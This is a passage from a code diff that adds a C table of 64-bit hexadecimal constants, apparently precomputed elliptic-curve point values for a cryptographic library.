UINT64_C(0x6812D38AD1EB8C31), UINT64_C(0x1F77F3F1080D30BB), ++ UINT64_C(0x18D128335A8B1E98), UINT64_C(0x7FD39FA9299196CE), ++ UINT64_C(0xFB8C9F11CF4ED6D6), UINT64_C(0x4C00F604D6363194) } }, ++ { { UINT64_C(0x5C8AFCF9FA2A21C2), UINT64_C(0x71CBF2821928D133), ++ UINT64_C(0x56BEF28E42B29506), UINT64_C(0xAFBA250C70323DE2), ++ UINT64_C(0x3FE208D17DED2C30), UINT64_C(0xBD2CD213CE9AA598) }, ++ { UINT64_C(0x52C5EC52CFEED070), UINT64_C(0x0A7223E7D3DA336B), ++ UINT64_C(0x7156A4EDCE156B46), UINT64_C(0x9AF6C499ED7E6159), ++ UINT64_C(0x9D7A679713C029AD), UINT64_C(0xE5B5C9249018DC77) } }, ++ }, ++ { ++ { { UINT64_C(0x3F2EFF53DE1E4E55), UINT64_C(0x6B749943E4D3ECC4), ++ UINT64_C(0xAF10B18A0DDE190D), UINT64_C(0xF491B98DA26B0409), ++ UINT64_C(0x66080782A2B1D944), UINT64_C(0x59277DC697E8C541) }, ++ { UINT64_C(0xFDBFC5F6006F18AA), UINT64_C(0x435D165BFADD8BE1), ++ UINT64_C(0x8E5D263857645EF4), UINT64_C(0x31BCFDA6A0258363), ++ UINT64_C(0xF5330AB8D35D2503), UINT64_C(0xB71369F0C7CAB285) } }, ++ { { UINT64_C(0xE6A19DCC40ACC5A8), UINT64_C(0x1C3A1FF1DBC6DBF8), ++ UINT64_C(0xB4D89B9FC6455613), UINT64_C(0x6CB0FE44A7390D0E), ++ UINT64_C(0xADE197A459EA135A), UINT64_C(0xDA6AA86520680982) }, ++ { UINT64_C(0x03DB9BE95A442C1B), UINT64_C(0x221A2D732BFB93F2), ++ UINT64_C(0x44DEE8D4753C196C), UINT64_C(0x59ADCC700B7C6FF5), ++ UINT64_C(0xC6260EC24CA1B142), UINT64_C(0x4C3CB5C646CBD4F2) } }, ++ { { UINT64_C(0x8A15D6FEA417111F), UINT64_C(0xFE4A16BD71D93FCC), ++ UINT64_C(0x7A7EE38C55BBE732), UINT64_C(0xEFF146A51FF94A9D), ++ UINT64_C(0xE572D13EDD585AB5), UINT64_C(0xD879790E06491A5D) }, ++ { UINT64_C(0x9C84E1C52A58CB2E), UINT64_C(0xD79D13746C938630), ++ UINT64_C(0xDB12CD9B385F06C7), UINT64_C(0x0C93EB977A7759C3), ++ UINT64_C(0xF1F5B0FE683BD706), UINT64_C(0x541E4F7285EC3D50) } }, ++ { { UINT64_C(0x9A0E153581833608), UINT64_C(0x5CCE871E6E2833AC), ++ UINT64_C(0xC17059EAFB29777C), UINT64_C(0x7E40E5FAE354CAFD), ++ UINT64_C(0x9CF594054D07C371), UINT64_C(0x64CE36B2A71C3945) }, ++ { UINT64_C(0x69309E9656CAF487), UINT64_C(0x3D719E9F1AE3454B), ++ UINT64_C(0xF2164070E25823B6), UINT64_C(0xEAD851BD0BC27359), ++ UINT64_C(0x3D21BFE8B0925094), UINT64_C(0xA783B1E934A97F4E) } }, ++ { { UINT64_C(0x406B0C269546491A), UINT64_C(0x9E5E15E2F293C4E5), ++ UINT64_C(0xC60D641315B164DB), UINT64_C(0x0DA46F530C75A78E), ++ UINT64_C(0x7C599BB7EA0C656B), UINT64_C(0x0F07A5121B1A8122) }, ++ { UINT64_C(0x14C7204A15172686), UINT64_C(0x8FAEDFF85165625D), ++ UINT64_C(0x20F260CE37AEDE40), UINT64_C(0xC81F771E8F357FFE), ++ UINT64_C(0x25499197B0912557), UINT64_C(0x736197DC4C739C74) } }, ++ { { UINT64_C(0x6151BAB1381B3462), UINT64_C(0x27E5A07843DBD344), ++ UINT64_C(0x2CB05BD6A1C3E9FB), UINT64_C(0x2A75976027CF2A11), ++ UINT64_C(0x0ADCF9DBFF43E702), UINT64_C(0x4BBF03E21F484146) }, ++ { UINT64_C(0x0E74997F55B6521A), UINT64_C(0x15629231ADE17086), ++ UINT64_C(0x7F143E867493FC58), UINT64_C(0x60869095AF8B9670), ++ UINT64_C(0x482CFCD77E524869), UINT64_C(0x9E8060C31D454756) } }, ++ { { UINT64_C(0xE495747AC88B4D3B), UINT64_C(0xB7559835AE8A948F), ++ UINT64_C(0x67EEF3A9DEB56853), UINT64_C(0x0E20E2699DEE5ADF), ++ UINT64_C(0x9031AF6761F0A1AA), UINT64_C(0x76669D32683402BC) }, ++ { UINT64_C(0x90BD231306718B16), UINT64_C(0xE1B22A21864EFDAC), ++ UINT64_C(0xE4FFE9096620089F), UINT64_C(0xB84C842E3428E2D9), ++ UINT64_C(0x0E28C880FE3871FC), UINT64_C(0x8932F6983F21C200) } }, ++ { { UINT64_C(0x603F00CE6C90EA5D), UINT64_C(0x6473930740A2F693), ++ UINT64_C(0xAF65148B2174E517), UINT64_C(0x162FC2CAF784AE74), ++ UINT64_C(0x0D9A88254D5F6458), UINT64_C(0x0C2D586143AACE93) }, ++ { UINT64_C(0xBF1EADDE9F73CBFC), UINT64_C(0xDE9C34C09C68BBCA), ++ UINT64_C(0x6D95602D67EF8A1A), UINT64_C(0x0AF2581BA791B241), ++ UINT64_C(0x14F7736112CAD604), UINT64_C(0x19F2354DE2ACD1AD) } }, ++ { { UINT64_C(0x272F78F60D60F263), UINT64_C(0xE7A8F4AF208FD785), ++ UINT64_C(0x10E191C636554F2C), UINT64_C(0x06D88551FD5CD0B3), ++ UINT64_C(0x29BF856857069C27), UINT64_C(0x3CE7ECD828AA6FAD) }, ++ { UINT64_C(0x7D8A92D0E9F1A1D8), UINT64_C(0xD40C7FF8D30B5725), ++ UINT64_C(0x16BE6CB2F54CAEB8), UINT64_C(0x14CA471A14CB0A91), ++ UINT64_C(0xD5FF15B802733CAE), UINT64_C(0xCAF88D87DAA76580) } }, ++ { { UINT64_C(0x39430E222C046592), UINT64_C(0x6CDAE81F1AD26706), ++ UINT64_C(0x8C102159A25D9106), UINT64_C(0x9A44057227CA9F30), ++ UINT64_C(0x8D34C43070287FBC), UINT64_C(0x9003A45529DB8AFA) }, ++ { UINT64_C(0x91364CC37FD971AD), UINT64_C(0x7B3AA0489C60EDB7), ++ UINT64_C(0x58B0E008526F4DD8), UINT64_C(0xB7674454D86D98AE), ++ UINT64_C(0xC25F4051B2B45747), UINT64_C(0x8243BF9CCC043E8F) } }, ++ { { UINT64_C(0xA89641C643A0C387), UINT64_C(0x6D92205C87B9AB17), ++ UINT64_C(0x37D691F4DAA0E102), UINT64_C(0xEB3E52D7CDE5312E), ++ UINT64_C(0x60D3C09916F518A2), UINT64_C(0x7854C0518A378EEB) }, ++ { UINT64_C(0x7359DB514BBCAAC5), UINT64_C(0xF5B1B68C1713F102), ++ UINT64_C(0xDAEAE645E4398DE5), UINT64_C(0x8C8ACB6CD1ABFB82), ++ UINT64_C(0x2E8B76C3136423E2), UINT64_C(0x509DCB2DA8BA015E) } }, ++ { { UINT64_C(0x2FF368159AD9C59C), UINT64_C(0xB189A4E8658E65B9), ++ UINT64_C(0x7D33DDBBEA786AD2), UINT64_C(0x96D0D648C0D2DC05), ++ UINT64_C(0x05E49256BFA03BE9), UINT64_C(0x0EA4E7A68BAF5A1C) }, ++ { UINT64_C(0x3DDCE0B09F9AD5A8), UINT64_C(0xF78091959E49C2CB), ++ UINT64_C(0xBFCEF29D21782C2F), UINT64_C(0xE57AD39FC41BFD97), ++ UINT64_C(0xC04B93E81355AD19), UINT64_C(0xAABC9E6E59440F9F) } }, ++ { { UINT64_C(0x7AA481035B6459DA), UINT64_C(0x83EF74770166E880), ++ UINT64_C(0x536182B1511CCE80), UINT64_C(0xAFDD2EEE73CA55AA), ++ UINT64_C(0xAB910D0DA8716143), UINT64_C(0x8BEAA42B83707250) }, ++ { UINT64_C(0x4BCCFD898DA2AB3D), UINT64_C(0x1DBF68A9EC6AA105), ++ UINT64_C(0x32CE610868EB42DA), UINT64_C(0x5C2C2C858EA62E37), ++ UINT64_C(0x1ED2791FCD3088A7), UINT64_C(0x496B4FEBFF05070C) } }, ++ { { UINT64_C(0x9FA9121A0AA629C5), UINT64_C(0xE286CFF157558BEC), ++ UINT64_C(0x4D9D657E59813A4D), UINT64_C(0xC4676A1626103519), ++ UINT64_C(0x616160B32BD4DF80), UINT64_C(0x26FB78CC30FBAE87) }, ++ { UINT64_C(0x096070138F0F66BD), UINT64_C(0xDD4E2D0C03D9B90D), ++ UINT64_C(0x5D3A8912600D1B12), UINT64_C(0xF76DD52F4308E126), ++ UINT64_C(0x97CC04099E4FCCA6), UINT64_C(0x0CFBE31104C4DF7B) } }, ++ { { UINT64_C(0x6CA62C1228437A23), UINT64_C(0x0DAF335340E7A003), ++ UINT64_C(0x1FD07DF0D20F8079), UINT64_C(0xEAE7969C3BBC9749), ++ UINT64_C(0x55861AFA9ECAD022), UINT64_C(0xEC41DAD91FBC3D4C) }, ++ { UINT64_C(0x1FE4CB40DA8B261B), UINT64_C(0xC2671AB6427C5C9D), ++ UINT64_C(0xDFCDA7B8261D4939), UINT64_C(0x9E7B802B2072C0B9), ++ UINT64_C(0x3AFEE900C7828CC2), UINT64_C(0x3488BF28F6DE987F) } }, ++ { { UINT64_C(0x33B9F2DE7BE1F89E), UINT64_C(0xD4E80821299B15C9), ++ UINT64_C(0x87A3067A0E13F37F), UINT64_C(0x6D4C09ED55FD239F), ++ UINT64_C(0x48B1042D92EF014F), UINT64_C(0xA382B2E0B385A759) }, ++ { UINT64_C(0xBF571BB07F6F84F8), UINT64_C(0x25AFFA370CE87F50), ++ UINT64_C(0x826906D3FE54F1BC), UINT64_C(0x6B0421F4C53AE76A), ++ UINT64_C(0x44F85A3A4855EB3C), UINT64_C(0xF49E21518D1F2B27) } }, ++ }, ++ { ++ { { UINT64_C(0xC0426B775E3C647B), UINT64_C(0xBFCBD9398CF05348), ++ UINT64_C(0x31D312E3172C0D3D), UINT64_C(0x5F49FDE6EE754737), ++ UINT64_C(0x895530F06DA7EE61), UINT64_C(0xCF281B0AE8B3A5FB) }, ++ { UINT64_C(0xFD14973541B8A543), UINT64_C(0x41A625A73080DD30), ++ UINT64_C(0xE2BAAE07653908CF), UINT64_C(0xC3D01436BA02A278), ++ UINT64_C(0xA0D0222E7B21B8F8), UINT64_C(0xFDC270E9D7EC1297) } }, ++ { { UINT64_C(0x06A67BD29F101E64), UINT64_C(0xCB6E0AC7E1733A4A), ++ UINT64_C(0xEE0B5D5197BC62D2), UINT64_C(0x52B1703924C51874), ++ UINT64_C(0xFED1F42382A1A0D5), UINT64_C(0x55D90569DB6270AC) }, ++ { UINT64_C(0x36BE4A9C5D73D533), UINT64_C(0xBE9266D6976ED4D5), ++ UINT64_C(0xC17436D3B8F8074B), UINT64_C(0x3BB4D399718545C6), ++ UINT64_C(0x8E1EA3555C757D21), UINT64_C(0xF7EDBC978C474366) } }, ++ { { UINT64_C(0xEC72C6506EA83242), UINT64_C(0xF7DE7BE51B2D237F), ++ UINT64_C(0x3C5E22001819EFB0), UINT64_C(0xDF5AB6D68CDDE870), ++ UINT64_C(0x75A44E9D92A87AEE), UINT64_C(0xBDDC46F4BCF77F19) }, ++ { UINT64_C(0x8191EFBD669B674D), UINT64_C(0x52884DF9ED71768F), ++ UINT64_C(0xE62BE58265CF242C), UINT64_C(0xAE99A3B180B1D17B), ++ UINT64_C(0x48CBB44692DE59A9), UINT64_C(0xD3C226CF2DCB3CE2) } }, ++ { { UINT64_C(0x9580CDFB9FD94EC4), UINT64_C(0xED273A6C28631AD9), ++ UINT64_C(0x5D3D5F77C327F3E7), UINT64_C(0x05D5339C35353C5F), ++ UINT64_C(0xC56FB5FE5C258EB1), UINT64_C(0xEFF8425EEDCE1F79) }, ++ { UINT64_C(0xAB7AA141CF83CF9C), UINT64_C(0xBD2A690A207D6D4F), ++ UINT64_C(0xE1241491458D9E52), UINT64_C(0xDD2448CCAA7F0F31), ++ UINT64_C(0xEC58D3C7F0FDA7AB), UINT64_C(0x7B6E122DC91BBA4D) } }, ++ { { UINT64_C(0x2A2DEDAFB1B48156), UINT64_C(0xA0A2C63ABB93DB87), ++ UINT64_C(0xC655907808ACD99E), UINT64_C(0x03EA42AFFE4AC331), ++ UINT64_C(0x43D2C14AEB180ED6), UINT64_C(0xC2F293DDB1156A1A) }, ++ { UINT64_C(0x1FAFABF5A9D81249), UINT64_C(0x39ADDEAD9A8EEE87), ++ UINT64_C(0x21E206F2119E2E92), UINT64_C(0xBC5DCC2ED74DCEB6), ++ UINT64_C(0x86647FA30A73A358), UINT64_C(0xEAD8BEA42F53F642) } }, ++ { { UINT64_C(0x636225F591C09091), UINT64_C(0xCCF5070A71BDCFDF), ++ UINT64_C(0x0EF8D625B9668EE2), UINT64_C(0x57BDF6CDB5E04E4F), ++ UINT64_C(0xFC6AB0A67C75EA43), UINT64_C(0xEB6B8AFBF7FD6EF3) }, ++ { UINT64_C(0x5B2AEEF02A3DF404), UINT64_C(0x31FD3B48B9823197), ++ UINT64_C(0x56226DB683A7EB23), UINT64_C(0x3772C21E5BB1ED2F), ++ UINT64_C(0x3E833624CD1ABA6A), UINT64_C(0xBAE58FFAAC672DAD) } }, ++ { { UINT64_C(0xCE92224D31BA1705), UINT64_C(0x022C6ED2F0197F63), ++ UINT64_C(0x21F18D99A4DC1113), UINT64_C(0x5CD04DE803616BF1), ++ UINT64_C(0x6F9006799FF12E08), UINT64_C(0xF59A331548E61DDF) }, ++ { UINT64_C(0x9474D42CB51BD024), UINT64_C(0x11A0A4139051E49D), ++ UINT64_C(0x79C92705DCE70EDB), UINT64_C(0x113CE27834198426), ++ UINT64_C(0x8978396FEA8616D2), UINT64_C(0x9A2A14D0EA894C36) } }, ++ { { UINT64_C(0x4F1E1254604F6E4A), UINT64_C(0x4513B0880187D585), ++ UINT64_C(0x9022F25719E0F482), UINT64_C(0x51FB2A80E2239DBF), ++ UINT64_C(0x49940D9E998ED9D5), UINT64_C(0x0583D2416C932C5D) }, ++ { UINT64_C(0x1188CEC8F25B73F7), UINT64_C(0xA28788CB3B3D06CD), ++ UINT64_C(0xDEA194ECA083DB5A), UINT64_C(0xD93A4F7E22DF4272), ++ UINT64_C(0x8D84E4BF6A009C49), UINT64_C(0x893D8DD93E3E4A9E) } }, ++ { { UINT64_C(0x35E909EA33D31160), UINT64_C(0x5020316857172F1E), ++ UINT64_C(0x2707FC4451F3D866), UINT64_C(0xEB9D2018D2442A5D), ++ UINT64_C(0x904D72095DBFE378), UINT64_C(0x6DB132A35F13CF77) }, ++ { UINT64_C(0x9D842BA67A3AF54B), UINT64_C(0x4E16EA195AA5B4F9), ++ UINT64_C(0x2BBA457CAF24228E), UINT64_C(0xCC04B3BB16F3C5FE), ++ UINT64_C(0xBAFAC51677E64944), UINT64_C(0x31580A34F08BCEE0) } }, ++ { { UINT64_C(0xC6808DEE20C30ACA), UINT64_C(0xDADD216FA3EA2056), ++ UINT64_C(0xD331394E7A4A9F9D), UINT64_C(0x9E0441AD424C4026), ++ UINT64_C(0xAEED102F0AEB5350), UINT64_C(0xC6697FBBD45B09DA) }, ++ { UINT64_C(0x52A2590EDEAC1496), UINT64_C(0x7142B831250B87AF), ++ UINT64_C(0xBEF2E68B6D0784A8), UINT64_C(0x5F62593AA5F71CEF), ++ UINT64_C(0x3B8F7616B5DA51A3), UINT64_C(0xC7A6FA0DB680F5FE) } }, ++ { { UINT64_C(0x36C21DE699C8227C), UINT64_C(0xBEE3E867C26813B1), ++ UINT64_C(0x9B05F2E6BDD91549), UINT64_C(0x34FF2B1FA7D1110F), ++ UINT64_C(0x8E6953B937F67FD0), UINT64_C(0x56C7F18BC3183E20) }, ++ { UINT64_C(0x48AF46DE9E2019ED), UINT64_C(0xDEAF972EF551BBBF), ++ UINT64_C(0x88EE38F8CC5E3EEF), UINT64_C(0xFB8D7A44392D6BAF), ++ UINT64_C(0x32293BFC0127187D), UINT64_C(0x7689E767E58647CC) } }, ++ { { UINT64_C(0x00CE901B52168013), UINT64_C(0xC6BF8E38837AAE71), ++ UINT64_C(0xD6F11EFA167677D8), UINT64_C(0xE53BB48586C8E5CF), ++ UINT64_C(0x671167CEC48E74AB), UINT64_C(0x8A40218C8AD720A7) }, ++ { UINT64_C(0x81E827A6E7C1191A), UINT64_C(0x54058F8DADDB153D), ++ UINT64_C(0x0BAF29250D950FA2), UINT64_C(0xC244674D576DDA13), ++ UINT64_C(0x8C4630AE41BCD13B), UINT64_C(0x6C2127BF5A077419) } }, ++ { { UINT64_C(0xCF977FD5A83C501F), UINT64_C(0xD7C6DF36B6AB176F), ++ UINT64_C(0x117F6331397BC6B5), UINT64_C(0x72A6078BF7A2D491), ++ UINT64_C(0xE5A2AAED5242FE2E), UINT64_C(0x88ECFFDCFEBDC212) }, ++ { UINT64_C(0xF2DBBF50CE33BA21), UINT64_C(0xE1343B76CEB19F07), ++ UINT64_C(0x1F32D4C9D2C28F71), UINT64_C(0x93FC64B418587685), ++ UINT64_C(0x39CEEF9BBA1F8BD1), UINT64_C(0x99C36A788D6D6BB0) } }, ++ { { UINT64_C(0x0D0638173E9561CF), UINT64_C(0x1D8646AA3D33704D), ++ UINT64_C(0x8C4513847A08BA33), UINT64_C(0x96446BD3E02D6624), ++ UINT64_C(0x749849F02D6F4166), UINT64_C(0xE364DA0114268BF0) }, ++ { UINT64_C(0x7CE4587E9AEBFCFD), UINT64_C(0xD468606456234393), ++ UINT64_C(0x00231D5116DF73B2), UINT64_C(0xF6A969B77279C78C), ++ UINT64_C(0x1FF1F6B66CB4117C), UINT64_C(0x30AEBC39D3EAB680) } }, ++ { { UINT64_C(0x5CC97E6493EF00B9), UINT64_C(0xDAE13841972345AE), ++ UINT64_C(0x858391844788F43C), UINT64_C(0xD0FF521EE2E6CF3E), ++ UINT64_C(0xAED14A5B4B707C86), UINT64_C(0x7EAAE4A6D2523CF7) }, ++ { UINT64_C(0x266472C5024C8AC6), UINT64_C(0xE47E1522C0170051), ++ UINT64_C(0x7B83DA6173826BAE), UINT64_C(0xE97E19F5CF543F0D), ++ UINT64_C(0x5D5248FA20BF38E2), UINT64_C(0x8A7C2F7DDF56A037) } }, ++ { { UINT64_C(0xB04659DD87B0526C), UINT64_C(0x593C604A2307565E), ++ UINT64_C(0x49E522257C630AB8), UINT64_C(0x24C1D0C6DCE9CD23), ++ UINT64_C(0x6FDB241C85177079), UINT64_C(0x5F521D19F250C351) }, ++ { UINT64_C(0xFB56134BA6FB61DF), UINT64_C(0xA4E70D69D75C07ED), ++ UINT64_C(0xB7A824487D8825A8), UINT64_C(0xA3AEA7D4DD64BBCC), ++ UINT64_C(0xD53E6E6C8692F539), UINT64_C(0x8DDDA83BF7AA4BC0) } }, ++ }, ++ { ++ { { UINT64_C(0x140A0F9FDD93D50A), UINT64_C(0x4799FFDE83B7ABAC), ++ UINT64_C(0x78FF7C2304A1F742), UINT64_C(0xC0568F51195BA34E), ++ UINT64_C(0xE97183603B7F78B4), UINT64_C(0x9CFD1FF1F9EFAA53) }, ++ { UINT64_C(0xE924D2C5BB06022E), UINT64_C(0x9987FA86FAA2AF6D), ++ UINT64_C(0x4B12E73F6EE37E0F), UINT64_C(0x1836FDFA5E5A1DDE), ++ UINT64_C(0x7F1B92259DCD6416), UINT64_C(0xCB2C1B4D677544D8) } }, ++ { { UINT64_C(0x0254486D9C213D95), UINT64_C(0x68A9DB56CB2F6E94), ++ UINT64_C(0xFB5858BA000F5491), UINT64_C(0x1315BDD934009FB6), ++ UINT64_C(0xB18A8E0AC42BDE30), UINT64_C(0xFDCF93D1F1070358) }, ++ { UINT64_C(0xBEB1DB753022937E), UINT64_C(0x9B9ECA7ACAC20DB4), ++ UINT64_C(0x152214D4E4122B20), UINT64_C(0xD3E673F2AABCCC7B), ++ UINT64_C(0x94C50F64AED07571), UINT64_C(0xD767059AE66B4F17) } }, ++ { { UINT64_C(0x40336B12DCD6D14B), UINT64_C(0xF6BCFF5DE3B4919C), ++ UINT64_C(0xC337048D9C841F0C), UINT64_C(0x4CE6D0251D617F50), ++ UINT64_C(0x00FEF2198117D379), UINT64_C(0x18B7C4E9F95BE243) }, ++ { UINT64_C(0x98DE119E38DF08FF), UINT64_C(0xDFD803BD8D772D20), ++ UINT64_C(0x94125B720F9678BD), UINT64_C(0xFC5B57CD334ACE30), ++ UINT64_C(0x09486527B7E86E04), UINT64_C(0xFE9F8BCC6E552039) } }, ++ { { UINT64_C(0x3B75C45BD6F5A10E), UINT64_C(0xFD4680F4C1C35F38), ++ UINT64_C(0x5450227DF8E0A113), UINT64_C(0x5E69F1AE73DDBA24), ++ UINT64_C(0x2007B80E57F24645), UINT64_C(0xC63695DC3D159741) }, ++ { UINT64_C(0xCBE54D294530F623), UINT64_C(0x986AD5732869586B), ++ UINT64_C(0xE19F70594CC39F73), UINT64_C(0x80F00AB32B1B8DA9), ++ UINT64_C(0xB765AAF973F68D26), UINT64_C(0xBC79A394E993F829) } }, ++ { { UINT64_C(0x9C441043F310D2A0), UINT64_C(0x2865EE58DC5EB106), ++ UINT64_C(0x71A959229CB8065C), UINT64_C(0x8EB3A733A052AF0F), ++ UINT64_C(0x56009F42B09D716E), UINT64_C(0xA7F923C5ABCBE6AD) }, ++ { UINT64_C(0x263B7669FA375C01), UINT64_C(0x641C47E521EF27A2), ++ UINT64_C(0xA89B474EB08FFD25), UINT64_C(0x5BE8EC3FF0A239F3), ++ UINT64_C(0x0E79957A242A6C5A), UINT64_C(0x1DFB26D00C6C75F5) } }, ++ { { UINT64_C(0x2FD97B9B9DFBF22A), UINT64_C(0xDEC16CC85643532D), ++ UINT64_C(0xDF0E6E3960FEE7C3), UINT64_C(0xD09AD7B6545860C8), ++ UINT64_C(0xCC16E98473FC3B7C), UINT64_C(0x6CE734C10D4E1555) }, ++ { UINT64_C(0xC6EFE68B4B5F6032), UINT64_C(0x3A64F34C14F54073), ++ UINT64_C(0x25DA689CAC44DC95), UINT64_C(0x990C477E5358AD8A), ++ UINT64_C(0x00E958A5F36DA7DE), UINT64_C(0x902B7360C9B6F161) } }, ++ { { UINT64_C(0x454AB42C9347B90A), UINT64_C(0xCAEBE64AA698B02B), ++ UINT64_C(0x119CDC69FB86FA40), UINT64_C(0x2E5CB7ADC3109281), ++ UINT64_C(0x67BB1EC5CD0C3D00), UINT64_C(0x5D430BC783F25BBF) }, ++ { UINT64_C(0x69FD84A85CDE0ABB), UINT64_C(0x69DA263E9816B688), ++ UINT64_C(0xE52D93DF0E53CBB8), UINT64_C(0x42CF6F25ADD2D5A7), ++ UINT64_C(0x227BA59DC87CA88F), UINT64_C(0x7A1CA876DA738554) } }, ++ { { UINT64_C(0x3FA5C1051CAC82C4), UINT64_C(0x23C760878A78C9BE), ++ UINT64_C(0xE98CDAD61C5CFA42), UINT64_C(0x09C302520A6C0421), ++ UINT64_C(0x149BAC7C42FC61B9), UINT64_C(0x3A1C22AC3004A3E2) }, ++ { UINT64_C(0xDE6B0D6E202C7FED), UINT64_C(0xB2457377E7E63052), ++ UINT64_C(0x31725FD43706B3EF), UINT64_C(0xE16A347D2B1AFDBF), ++ UINT64_C(0xBE4850C48C29CF66), UINT64_C(0x8F51CC4D2939F23C) } }, ++ { { UINT64_C(0x169E025B219AE6C1), UINT64_C(0x55FF526F116E1CA1), ++ UINT64_C(0x01B810A3B191F55D), UINT64_C(0x2D98127229588A69), ++ UINT64_C(0x53C9377048B92199), UINT64_C(0x8C7DD84E8A85236F) }, ++ { UINT64_C(0x293D48B6CAACF958), UINT64_C(0x1F084ACB43572B30), ++ UINT64_C(0x628BFA2DFAD91F28), UINT64_C(0x8D627B11829386AF), ++ UINT64_C(0x3EC1DD00D44A77BE), UINT64_C(0x8D3B0D08649AC7F0) } }, ++ { { UINT64_C(0x00A93DAA177513BF), UINT64_C(0x2EF0B96F42AD79E1), ++ UINT64_C(0x81F5AAF1A07129D9), UINT64_C(0xFC04B7EF923F2449), ++ UINT64_C(0x855DA79560CDB1B7), UINT64_C(0xB1EB5DABAD5D61D4) }, ++ { UINT64_C(0xD2CEF1AE353FD028), UINT64_C(0xC21D54399EE94847), ++ UINT64_C(0x9ED552BB0380C1A8), UINT64_C(0xB156FE7A2BAC328F), ++ UINT64_C(0xBB7E01967213C6A4), UINT64_C(0x36002A331701ED5B) } }, ++ { { UINT64_C(0x20B1632ADDC9EF4D), UINT64_C(0x2A35FF4C272D082B), ++ UINT64_C(0x30D39923F6CC9BD3), UINT64_C(0x6D879BC2E65C9D08), ++ UINT64_C(0xCE8274E16FA9983C), UINT64_C(0x652371E80EB7424F) }, ++ { UINT64_C(0x32B77503C5C35282), UINT64_C(0xD7306333C885A931), ++ UINT64_C(0x8A16D71972955AA8), UINT64_C(0x5548F1637D51F882), ++ UINT64_C(0xB311DC66BABA59EF), UINT64_C(0x773D54480DB8F627) } }, ++ { { UINT64_C(0x59B1B1347A62EB3B), UINT64_C(0x0F8CE157CCEEFB34), ++ UINT64_C(0x3FE842A8A798CB2B), UINT64_C(0xD01BC6260BF4161D), ++ UINT64_C(0x55EF6E554D016FDB), UINT64_C(0xCB561503B242B201) }, ++ { UINT64_C(0x076EBC73AF4199C1), UINT64_C(0x39DEDCBB697244F7), ++ UINT64_C(0x9D184733040162BC), UINT64_C(0x902992C17F6B5FA6), ++ UINT64_C(0xAD1DE754BB4952B5), UINT64_C(0x7ACF1B93A121F6C8) } }, ++ { { UINT64_C(0x7A56867C325C9B9A), UINT64_C(0x1A143999F3DC3D6A), ++ UINT64_C(0xCE10959003F5BCB8), UINT64_C(0x034E9035D6EEE5B7), ++ UINT64_C(0x2AFA81C8495DF1BC), UINT64_C(0x5EAB52DC08924D02) }, ++ { UINT64_C(0xEE6AA014AA181904), UINT64_C(0xE62DEF09310AD621), ++ UINT64_C(0x6C9792FCC7538A03), UINT64_C(0xA89D3E883E41D789), ++ UINT64_C(0xD60FA11C9F94AE83), UINT64_C(0x5E16A8C2E0D6234A) } }, ++ { { UINT64_C(0x87EC053DA9242F3B), UINT64_C(0x99544637F0E03545), ++ UINT64_C(0xEA0633FF6B7019E9), UINT64_C(0x8CB8AE0768DDDB5B), ++ UINT64_C(0x892E7C841A811AC7), UINT64_C(0xC7EF19EB73664249) }, ++ { UINT64_C(0xD1B5819ACD1489E3), UINT64_C(0xF9C80FB0DE45D24A), ++ UINT64_C(0x045C21A683BB7491), UINT64_C(0xA65325BE73F7A47D), ++ UINT64_C(0x08D09F0E9C394F0C), UINT64_C(0xE7FB21C6268D4F08) } }, ++ { { UINT64_C(0xC4CCAB956CA95C18), UINT64_C(0x563FFD56BC42E040), ++ UINT64_C(0xFA3C64D8E701C604), UINT64_C(0xC88D4426B0ABAFEE), ++ UINT64_C(0x1A353E5E8542E4C3), UINT64_C(0x9A2D8B7CED726186) }, ++ { UINT64_C(0xD61CE19042D097FA), UINT64_C(0x6A63E280799A748B), ++ UINT64_C(0x0F48D0633225486B), UINT64_C(0x848F8FE142A3C443), ++ UINT64_C(0x2CCDE2508493CEF4), UINT64_C(0x5450A50845E77E7C) } }, ++ { { UINT64_C(0xD0F4E24803112816), UINT64_C(0xFCAD9DDBCCBE9E16), ++ UINT64_C(0x177999BF5AE01EA0), UINT64_C(0xD20C78B9CE832DCE), ++ UINT64_C(0x3CC694FB50C8C646), UINT64_C(0x24D75968C93D4887) }, ++ { UINT64_C(0x9F06366A87BC08AF), UINT64_C(0x59FAB50E7FD0DF2A), ++ UINT64_C(0x5FFCC7F76C4CC234), UINT64_C(0x87198DD765F52D86), ++ UINT64_C(0x5B9C94B0A855DF04), UINT64_C(0xD8BA6C738A067AD7) } }, ++ }, ++ { ++ { { UINT64_C(0x9E9AF3151C4C9D90), UINT64_C(0x8665C5A9D12E0A89), ++ UINT64_C(0x204ABD9258286493), UINT64_C(0x79959889B2E09205), ++ UINT64_C(0x0C727A3DFE56B101), UINT64_C(0xF366244C8B657F26) }, ++ { UINT64_C(0xDE35D954CCA65BE2), UINT64_C(0x52EE1230B0FD41CE), ++ UINT64_C(0xFA03261F36019FEE), UINT64_C(0xAFDA42D966511D8F), ++ UINT64_C(0xF63211DD821148B9), UINT64_C(0x7B56AF7E6F13A3E1) } }, ++ { { UINT64_C(0x47FE47995913E184), UINT64_C(0x5BBE584C82145900), ++ UINT64_C(0xB76CFA8B9A867173), UINT64_C(0x9BC87BF0514BF471), ++ UINT64_C(0x37392DCE71DCF1FC), UINT64_C(0xEC3EFAE03AD1EFA8) }, ++ { UINT64_C(0xBBEA5A3414876451), UINT64_C(0x96E5F5436217090F), ++ UINT64_C(0x5B3D4ECD9B1665A9), UINT64_C(0xE7B0DF26E329DF22), ++ UINT64_C(0x18FB438E0BAA808D), UINT64_C(0x90757EBFDD516FAF) } }, ++ { { UINT64_C(0x1E6F9A95D5A98D68), UINT64_C(0x759EA7DF849DA828), ++ UINT64_C(0x365D56256E8B4198), UINT64_C(0xE1B9C53B7A4A53F9), ++ UINT64_C(0x55DC1D50E32B9B16), UINT64_C(0xA4657EBBBB6D5701) }, ++ { UINT64_C(0x4C270249EACC76E2), UINT64_C(0xBE49EC75162B1CC7), ++ UINT64_C(0x19A95B610689902B), UINT64_C(0xDD5706BFA4CFC5A8), ++ UINT64_C(0xD33BDB7314E5B424), UINT64_C(0x21311BD1E69EBA87) } }, ++ { { UINT64_C(0x75BA2F9B72A21ACC), UINT64_C(0x356688D4A28EDB4C), ++ UINT64_C(0x3C339E0B610D080F), UINT64_C(0x614AC29333A99C2F), ++ UINT64_C(0xA5E23AF2AA580AFF), UINT64_C(0xA6BCB860E1FDBA3A) }, ++ { UINT64_C(0xAA603365B43F9425), UINT64_C(0xAE8D7126F7EE4635), ++ UINT64_C(0xA2B2524456330A32), UINT64_C(0xC396B5BB9E025AA3), ++ UINT64_C(0xABBF77FAF8A0D5CF), 